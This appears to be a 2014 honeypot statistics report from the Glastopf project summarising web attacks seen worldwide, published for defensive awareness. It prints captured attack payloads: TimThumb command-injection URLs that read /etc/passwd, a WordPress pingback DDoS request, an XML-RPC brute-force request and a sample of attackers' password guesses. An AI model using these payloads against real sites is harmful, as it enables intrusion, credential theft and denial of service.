Global Glastopf statistics for June 2014

During the month of June the following information was obtained from Glastopf installations worldwide

Geographical spread

worldmap_201406

10 most popular injected files during the period

Short introduction to RFI:

“Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as: Code execution on the web server .. “ source: Wikipedia

Hash Hits VirusTotal detection ratio
30a7bb30303f7da9ad102edc313dc80e 929 0 / 52
ab4d03072cc0532afc83d13854ed7e4f 577 22 / 49
474c4daeff3d82ae49d7c96acb8c0d84 514 21 / 53
9f67913d2c77545a4187053ad18230e4 496 7 / 52
369aab6f3a40d0259e6b036b68c27d25 411 7 / 54
10b5c4f77bbd80a3886e591dc3426198 267 N / A
6427bb17f4922b82c0147099429cfef9 203 3 / 53
be52cd4e8a8f6e42418c87d3468bba20 191 9 / 51
f922514cec9b9dc9c74b99ce9e39d3bc 164 15 / 53
46f5757064a2a0a081d6fd099f2916b5 159 18 / 46

Note: VirusTotal scan was performed on the 20:th of July 2014. N/A means that the injected binary was no longer present at it's original location and no sample could be acquired

Top pick from list of requested resources

Glastopf is a web application Honeypot which emulates vulnerabilities and lures the attacker that the requested service/application is vulnerable to gather data from attacks targeting web applications.

Resource Count
admin 467194
administrator/index.php 73285
changes.html 13193
wp-login.php 11248
awstats/awstats.pl 9961
robots.txt 8620
xmlrpc.php 8175
index.php?app=core&module=global&section=login&do=process 7339
phpMyAdmin-2.5.5/index.php 3738
phpMyAdmin-2.5.5-pl1/index.php 3712
awstats/awstats.pl?framename=mainright&output=refererpages 3538

Other requests that are interesting to highlight

Resource Reference CVE
plugin_googlemap2_proxy.php http://securityvulns.ru/docs29645.html CVE-2013-4764
HNAP1/ http://tools.cisco.com/security/center/viewAlert.x?alertId=32899 CVE-2013-5122
rom-0 http://www.exploit-db.com/exploits/33803/ CVE-2014-4019
cgi-bin/rtpd.cgi http://www.coresecurity.com/advisories/d-link-ip-cameras-multiple-vulnerabilities CVE-2013-1599

And a few findings that we found extra interesting

TimThumb Remote Code Execution: webshot

About

TimThumb is a small php script for cropping, zooming and resizing web images (jpg, png, gif).

Exploitation

http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
<wp-website>$(<os-cmds>)

Please see the URL below for more information about this vulnerability
URL http://cxsecurity.com/issue/WLB-2014060134

Example of collected requests

       
http://<wp-website>/wp-content/themes/eGallery/HTTP/wp-content/themes/eGallery/timthumb.php?webshot=1&src=http://<wp-website>/$(ls)

http://<wp-website>/wp-content/themes/eGallery/HTTP/wp-content/themes/eGallery/timthumb.php?webshot=1&src=http://<wp-website>/$(touch$IFS/tmp/a.txt)

http://<wp-website>/wp-content/themes/eGallery/HTTP/wp-content/themes/eGallery/timthumb.php?webshot=1&src=http://<wp-website> /$(cat$IFS/etc/passwd)

WordPress Pingback.ping DDoS attempts

About

pingback.ping, is a legit WordPress feature misused to DoS victims using legit WordPress sites.

Please see the URL below for more information about this vulnerability
URL http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-
denial-of-service-attack.html

Exploitation

<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com
</string></value></param><param><value><string>www.anywordpresssite.com/postchosen</string></value></
param></params></methodCall >'

Victims per category

In an attempt to visualise the type of targets for these attacks we took the help of the public available resource: sitereview.bluecoat.com to categorise the targeted sites

pie_chart06-2014

Many of the sites categorised as not yet rated by the webfilter vendor, ended up being sites offering DDoS services, many of them protected by legit DDoS protection services.

WordPress wp.getUsersBlogs brute force attempts

Comment
We were able to quickly detect wp.getUserBlogs attempts when they "started",
now a month later there are several blog post describing the issue.

The first occurrences detected was on the 29:th of June, targeting only a limited amount of Honeypots and originated from two European countries.

About

"This attack is being made possible because many calls in the WordPress XMLRPC implementation required a
username and password. It these attacks, we are seeing wp.getUsersBlogs being used (and very few times
wp.getComments), but it could be other calls as well. If you provide a user and a password to them, it will reply back if
the combination is correct or not:" sucuri.net

Please see the URL below for more information about this vulnerability
URL http://blog.sucuri.net/2014/07/new-brute-force-attacks-exploiting-xmlrpc-in-wordpress.html

Exploitation

<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
<string>admin</string></value></param>
<param><value><string>112233</string></value></param></params>
</methodCall>

Passwords

The list is quite long, so here is a small sample

password melody master
gogogo "name of the domain" admin
12345678 trustno1 test
secret reset123 qwerty123
pass fuck audrey
admin123 1qaz2wsx 123
12345 123456 123456789
1111 zaq12wsx yellow
wisdom winter windows

Summary

This was a small excerpt from the collected data. I hope this encouraged you to continue to have hpfeeds enabled (or to enable it, if you have turned it off) on your honeypot/honeypots as the data gives a very valuable insight into current threats globally.

System reference:

“Glastopf is a Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications. The principle behind it is very simple: Reply the correct response to the attacker exploiting the web application.”

For more information please visit:
URL http://www.glastopf.org/index.php or https://github.com/glastopf/glastopf

All data was collected using hpfriends, for more information please visit
URL http://hpfriends.honeycloud.net/